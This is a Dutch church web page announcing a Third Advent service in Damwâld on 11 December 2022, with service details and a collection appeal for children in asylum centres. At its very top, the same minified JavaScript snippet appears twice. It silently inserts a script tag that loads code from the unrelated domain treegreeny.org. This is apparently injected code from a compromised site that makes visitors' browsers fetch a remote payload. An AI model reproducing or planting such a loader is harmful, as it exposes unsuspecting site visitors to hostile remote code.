;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 11 december 2022 9:30 uur - PKN Damwâld
zondag 11 december 2022
09:30 uur
Derde Advent

Kerkdienst zondag 11 december 2022 9:30 uur

Informatie

Voorganger:Ds. G.J. Otter
Organist:Nienke van der Heide-Visser
Mededeling:Derde Advent
LivestreamDienst terugkijken
Bekijk op Youtube
Locatie: de Ontmoeting Foarwei 38, 9104 BX Damwâld
Collecte informatie
Uitganscollecte: Collecte kerk in actie 2022 Werelddiaconaat (collectenr. 22115)

Iedere dag vluchten er kinderen en jongeren voor geweld en onderdrukking. Sommigen komen naar Nederland waar ze met of zonder ouders in asielzoekerscentra wachten op de beslissing of ze mogen blijven.
Stichting De Vrolijkheid organiseert bij asielzoekerscentra wekelijks het Kunstlab met meer dan honderd kunstprojecten. Via dans, theater, muziek, nieuwe media en beeldende kunst geven kinderen en jongeren vorm aan hun eigen verhalen. Kunst en creativiteit versterken hun veerkracht en zelfvertrouwen en bieden hen de mogelijkheid hun talenten te ontdekken en te ontwikkelen.
Met steun van Kerk in Actie is het Vakantie Kunstlab ontwikkeld, zodat jonge azc-bewoners ook in de schoolvakanties creatieve workshops kunnen bezoeken. Met een feestelijke presentatie voor bewoners van azc’s worden de workshops afgesloten. Met uw bijdrage aan de collecte steunt u het diaconale werk van Kerk in Actie, zoals het zoals het werk voor kinderen en jongeren in azc’s en andere diaconale projecten.